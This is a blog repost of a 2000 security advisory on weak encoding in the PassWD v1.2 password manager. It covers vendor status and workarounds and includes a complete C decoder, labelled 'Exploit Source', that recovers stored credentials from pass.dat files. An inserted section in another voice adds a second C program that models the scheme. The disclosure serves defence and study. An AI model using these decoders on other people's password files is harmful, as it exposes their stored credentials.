Thursday, December 15, 2011

Advisories II

==[ Roe's Security Advisory # 1 (yeeha!) ]======[4th June 2000]==

Insecure encryption in PassWD v1.2

Vulnerable:          PassWD v1.2 for Windows 9x, NT and 2000
Vendor:              Giordano Bigarelli
Vendor location:     http://web.tiscalinet.it/gbigarelli/
Advisory author:     Daniel Roethlisberger <admin@roe.ch>
Advisory location:   http://www.roe.ch/download/advisory001.txt

--[ Description ]------------------------------------------------

PassWD is a password management program designed to store all
of a user's username and password combinations along with a
site URL. Due to the fact that PassWD is being spread by
well-known free/shareware distribution sites such as tucows.com,
the community should be aware that it is very insecure.

The documentation claims that PassWD employs encryption. In
fact it uses a very weak coding that can easily be decoded.

If an attacker can get hold of the password file (usually this
will be pass.dat in PassWD's directory, which can be found in
the Registry), he can easily decode the file and thus retrieve
the user/password combinations along with the matching links,
and the master password used to `protect' the password list.

This is also very easily exploitable by malware such as
password-gathering trojans.

--[ Vendor Status ]----------------------------------------------

The author of PassWD is informed. He is informing registered
users of PassWD and any distribution sites offering
PassWD v1.2 for download.

The author is not developing PassWD v1.2 anymore.
There will be no patch or update available.

Instead there is a successor product called PassWD 2000,
which will be released shortly. The author claims that it
will employ a better (real) encryption algorithm.

--[ Solution ]---------------------------------------------------

There's no real solution <sigh>.

One possible workaround is to install PassWD on an encrypted
hard disk (eg. using PGPdisk or ScramDisk).

Another is to wait for the successor product `PassWD 2000',
which should be available shortly from the developer's web site
at http://web.tiscalinet.it/gbigarelli/ , where a beta version
is already available. Personally, I'd be wary of the beta
version specifically and of PassWD 2000 in general, which I
think is prudent unless source code review can verify that the
product is as secure as it should be.

After changing to a more secure solution, users of PassWD v1.2
will need to securely wipe their old pass.dat file (eg. using
the secure wipe functions of PGP).

--[ Details ]----------------------------------------------------

PassWD stores all the sensitive data in a file usually called
pass.dat (this can be changed in PassWD's INI file).
Unfortunately, it not only employs a very weak encoding
algorithm, but it also hides the key in the same file.
This key is purely random, and is in no way dependent on the
master password.

The key can take a value between 1 and 99, which shows the
extreme weakness of the system. The charset consisting of 99
characters is simply rotated by <key> positions.
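To make the scheme described above concrete, here is an added example (it is not part of the original advisory and not the PassWD product's own code) that models the coding as the advisory describes it: a 99-symbol alphabet rotated by a key between 1 and 99, with the key stored in the file itself as two 'b'-based decimal digits following a decoy byte, which is the header layout the advisory's decoder reads. The alphabet order and the key digit encoding are taken from that decoder; the sample entry, the decoy byte value and the function names are constructed for the example. Note that no master password appears anywhere in the computation, which is exactly why the master password protects nothing.

```c
#include <stdio.h>
#include <string.h>

/* The 99-symbol alphabet of PassWD v1.2, in the order the advisory's
 * decoder lists it: backspace, tab, LF, CR, then printable ASCII. */
static const char CHARSET[] =
    "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@"
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`"
    "abcdefghijklmnopqrstuvwxyz{|}~";
#define CHARSET_LEN 99

/* Position of c in the alphabet, or -1 if c is not one of its symbols. */
static int charset_index(unsigned char c)
{
    for (int i = 0; i < CHARSET_LEN; i++)
        if ((unsigned char)CHARSET[i] == c)
            return i;
    return -1;
}

/* Rotate one symbol forward by shift positions (mod 99); -1 if c is
 * outside the alphabet.  A shift of 99 is the identity. */
static int rotate(unsigned char c, int shift)
{
    int pos = charset_index(c);
    if (pos < 0)
        return -1;
    return (unsigned char)CHARSET[(pos + shift) % CHARSET_LEN];
}

/* Produce a pass.dat-style buffer: one decoy byte, the key as two
 * 'b'-based decimal digits, then the rotated body.  No master password
 * enters the computation at all.  Returns bytes written, or -1. */
int passwd12_encode(const char *plain, int key, unsigned char *out, size_t outlen)
{
    size_t n = strlen(plain);
    if (key < 1 || key > 99 || outlen < n + 3)
        return -1;
    out[0] = 'X';                           /* decoy byte: value is ignored */
    out[1] = (unsigned char)('b' + key / 10);
    out[2] = (unsigned char)('b' + key % 10);
    for (size_t i = 0; i < n; i++) {
        int r = rotate((unsigned char)plain[i], key);
        if (r < 0)
            return -1;
        out[3 + i] = (unsigned char)r;
    }
    return (int)(n + 3);
}

/* The key is recoverable from the file alone: bytes 1 and 2 spell it. */
int passwd12_recover_key(const unsigned char *buf, size_t len)
{
    if (len < 3)
        return -1;
    int key = (buf[1] - 'b') * 10 + (buf[2] - 'b');
    return (key >= 1 && key <= 99) ? key : -1;
}

/* Undo the rotation with the key read from the header.  Returns the
 * plaintext length, or -1 on a malformed header or body. */
int passwd12_decode(const unsigned char *buf, size_t len, char *out, size_t outlen)
{
    int key = passwd12_recover_key(buf, len);
    if (key < 0 || outlen < len - 2)        /* len - 3 symbols plus NUL */
        return -1;
    for (size_t i = 3; i < len; i++) {
        int r = rotate(buf[i], CHARSET_LEN - key);   /* pos - key, mod 99 */
        if (r < 0)
            return -1;
        out[i - 3] = (char)r;
    }
    out[len - 3] = '\0';
    return (int)(len - 3);
}

/* Round trip on a constructed sample entry (not real pass.dat data):
 * returns 1 when encode -> key recovery -> decode all agree. */
int passwd12_selftest(void)
{
    unsigned char file[64];
    char plain[64];
    int n = passwd12_encode("alice:hunter2", 42, file, sizeof file);
    if (n != 16)
        return 0;
    if (passwd12_recover_key(file, (size_t)n) != 42)
        return 0;
    if (passwd12_decode(file, (size_t)n, plain, sizeof plain) != 13)
        return 0;
    return strcmp(plain, "alice:hunter2") == 0;
}

int main(void)
{
    printf("round trip %s\n", passwd12_selftest() ? "ok" : "FAILED");
    return 0;
}
```

Two things stand out once the scheme is written down: the header hands over the key, so no guessing is ever required, and even without the header there are only 99 possible rotations, so the "encryption" adds no secrecy beyond obscurity of the file format.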

The below source code illustrates this. It can be used to
decode any given PassWD v1.2 `pass.dat' file to either stdout
or an output file.

--[ Exploit Source ]---------------------------------------------

/*
 *  Decoder for PassWD v1.2 `pass.dat' password files
 *
 *  Written 2000 by Daniel Roethlisberger <admin@roe.ch>
 *
 *  This code is hereby placed in the public domain.
 *  Use this code at your own risk for whatever you want.
 *
 *  The decoded data is not parsed in any way - it should
 *  be very easy for moderately experienced programmers
 *  to add that themselves.
 *
 */

#include <stdio.h>

int main(int argc, char *argv[])
{
   unsigned int charpos;
   FILE* outfile;
   FILE* infile;
   int a;
   int b;
   int key;
   int x;

   /* the 99-symbol alphabet, listed twice so that the index
      charpos + 99 - key never runs past the end of the array */
   unsigned char charset[] = "\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\b\t\n\r !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~";

   printf("\nDecoder for PassWD v1.2 `pass.dat' password files\n");
   printf("Written 2000 by Daniel Roethlisberger <admin@roe.ch>\n\n");

   if((argc > 3) || (argc < 2))
   {
      printf("Usage: %s <infile> [<outfile>]\n\n", argv[0]);
      printf("If <outfile> is omitted, the output is dumped to stdout.\n");
      return 1;
   }

   /* binary mode: \r and \n are symbols of the alphabet and must
      not be translated by text-mode I/O */
   infile = fopen(argv[1], "rb");
   if(infile == NULL)
   {
      printf("Could not open file %s\n", argv[1]);
      return 1;
   }

   if(argc == 2)
      outfile = stdout;
   else
   {
      outfile = fopen(argv[2], "wb");
      if(outfile == NULL)
      {
         printf("Could not write to file %s\n", argv[2]);
         fclose(infile);
         return 1;
      }
   }

   getc(infile);       /* jump over decoy byte    */
   a = getc(infile);   /* read encoded key byte 1 */
   b = getc(infile);   /* read encoded key byte 2 */

   if(a == EOF || b == EOF)
   {
      printf("ERROR - encountered EOF within header\n");
      fclose(infile);
      if(outfile != stdout)
         fclose(outfile);
      return 1;
   }

   /* this line `decodes' the key: two decimal digits, each
      stored as 'b' + digit */
   key = (a - 'b') * 10 + (b - 'b');
   if(key < 1 || key > 99)
   {
      printf("ERROR - key %d outside the expected range 1..99\n", key);
      fclose(infile);
      if(outfile != stdout)
         fclose(outfile);
      return 1;
   }

   /* read through infile and dump decoded output to outfile: */
   while((x = getc(infile)) != EOF)
   {
      for(charpos = 0; x != charset[charpos]; charpos++)
      {
         if(charpos > 99)
         {
            printf("\nERROR - encountered illegal character in source file\n");
            fclose(infile);
            if(outfile != stdout)
               fclose(outfile);
            return 1;
         }
      }
      /* plain = cypher - key */
      putc(charset[charpos + 99 - key], outfile);
   }

   if(argc == 2)
      printf("\n\n");
   printf("Done.\n");

   fclose(infile);
   if(outfile != stdout)
      fclose(outfile);
   return 0;
}

--[ Credits/Disclaimer ]-----------------------------------------

There was no reverse engineering involved in analysing this
vulnerability, therefore this security advisory constitutes no
violation of the user license agreement.

Permission is hereby granted to copy or redistribute this
advisory, but only in its entirety.

Copyright (C) 2000 by Daniel Roethlisberger <admin@roe.ch>.

Cheers,
Dan